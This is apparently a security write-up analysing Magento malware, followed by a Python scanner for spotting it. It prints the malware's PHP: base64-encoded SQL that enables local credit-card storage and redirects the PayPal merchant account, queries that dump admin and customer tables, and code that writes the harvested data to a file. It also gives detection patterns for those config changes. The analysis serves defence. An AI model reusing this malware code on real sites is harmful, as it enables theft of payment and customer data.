During the initial stages of the attack, the bad actor uses special SQL queries encoded in base64. We’ve decoded these strings under their respective lines in the sample below for your reference:

```php
$ConfKiller = array(
    'Update DB (Savecc)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
    // UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
    'Update PP (MailPP)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
    // UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';
);
```

In $ConfKiller, two major malicious operations are being executed:

Update DB (Savecc): This query configures the Magento core to save the client's credit card information locally, without letting it go through the typical payment processes that secure the payment information.

Update PP (MailPP): This query lets the attacker change the PayPal merchant business account associated with the Magento website.

Though Magento does encrypt the locally saved credit card information, in this scenario that is not enough, because the attacker can modify Magento core files and steal the encryption key from the Magento configuration file (./app/etc/local.xml). Once the attacker has access to your site, the attack usually doesn’t remain limited to credit card information: the attacker gains access to everything in the database. For this, the attacker adds a further array of SQL queries to extract information from the compromised Magento database:

```php
$query = array(
    'admin_user' => 'SELECT * FROM admin_user',
    'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients',
    'aw_blog_comment' => 'SELECT * FROM aw_blog_comment',
    'customer_entity' => 'SELECT * FROM customer_entity',
    // ... listing shortened for brevity
);
```

The array listing has been shortened for brevity, but it pulls any customer information stored in the most common Magento database tables (e.g. customer_entity, newsletter_subscriber). It then trims this data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing the relevant customer information:

```php
$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
    $hasil = mysql_query($shc_query);                  // $hasil: the result set for this table
    while ( $kolom_db = mysql_fetch_assoc($hasil) ) {  // $kolom_db: one row as an associative array
        // $shcolom (defined elsewhere in the script, not shown) maps each table name
        // to the single column that is kept from that table
        $mail[] = $kolom_db[$shcolom[$shc_key]];
        $myfile = fopen($namefile, "a+") or die("Unable to open file!");
        fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n");
        fclose($myfile);
    }
}
```

When run in a web browser, the malicious script simply provides a hyperlink to the generated *-shcMail.txt file. It then reports back to inform the attacker whether the initial two setting changes were successful.
Source: Sucuri
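As an added defender-side example (not code from the Sucuri write-up): a small Python scanner that finds inline base64_decode() literals in PHP source, decodes them, and flags any that write to core_config_data, with the two configuration paths from the decoded queries above on a watch-list. The sample PHP is constructed here from those decoded queries, with attacker@example.com as a placeholder for the redacted address.

```python
import base64
import re
from typing import List, Optional

# Magento config paths the decoded queries above rewrite (constructed watch-list).
SUSPICIOUS_PATHS = ("payment/ccsave/active", "paypal/general/business_account")
# Inline base64_decode('...') calls as in $ConfKiller; whitespace inside the
# literal is tolerated because wrapped dumps often split it.
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
# Any statement writing to core_config_data, the table that holds Magento settings.
CONFIG_WRITE = re.compile(
    r"\b(UPDATE|INSERT\s+INTO|REPLACE\s+INTO|DELETE\s+FROM)\s+`?core_config_data`?", re.I)

def decode_literal(literal: str) -> Optional[str]:
    """Decode a base64 literal after stripping embedded whitespace; None if invalid."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", literal), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", errors="replace")

def scan_php(source: str) -> List[dict]:
    """Return one finding per decoded literal that writes to core_config_data."""
    findings = []
    for m in B64_CALL.finditer(source):
        sql = decode_literal(m.group(1))
        if sql is None or not CONFIG_WRITE.search(sql):
            continue  # undecodable, or a read such as SELECT: not a config write
        findings.append({"offset": m.start(), "sql": " ".join(sql.split()),
                         "paths": [p for p in SUSPICIOUS_PATHS if p in sql]})
    return findings

def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()

# Constructed sample built from the decoded queries on the page; the PayPal address
# is a placeholder for the redacted one, and a space is inserted into the first
# literal to mimic a line-wrapped dump.
SAVECC_SQL = ("UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = "
              "'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';")
MAILPP_SQL = ("UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = "
              "'paypal/general/business_account', `value` = 'attacker@example.com' "
              "WHERE `path` = 'paypal/general/business_account';")
_w, _benign = _b64(SAVECC_SQL), _b64("SELECT 1")
SAMPLE_PHP = (f"<?php\n$ConfKiller = array(\n"
              f"  'Update DB (Savecc)' => base64_decode('{_w[:40]} {_w[40:]}'),\n"
              f"  'Update PP (MailPP)' => base64_decode('{_b64(MAILPP_SQL)}')\n);\n"
              f"$banner = base64_decode('{_benign}');\n")
```

Run scan_php() over each PHP file under the Magento document root; a hit on either watch-listed path is a direct indicator of the setting changes described above, and any other decoded write to core_config_data deserves a manual look.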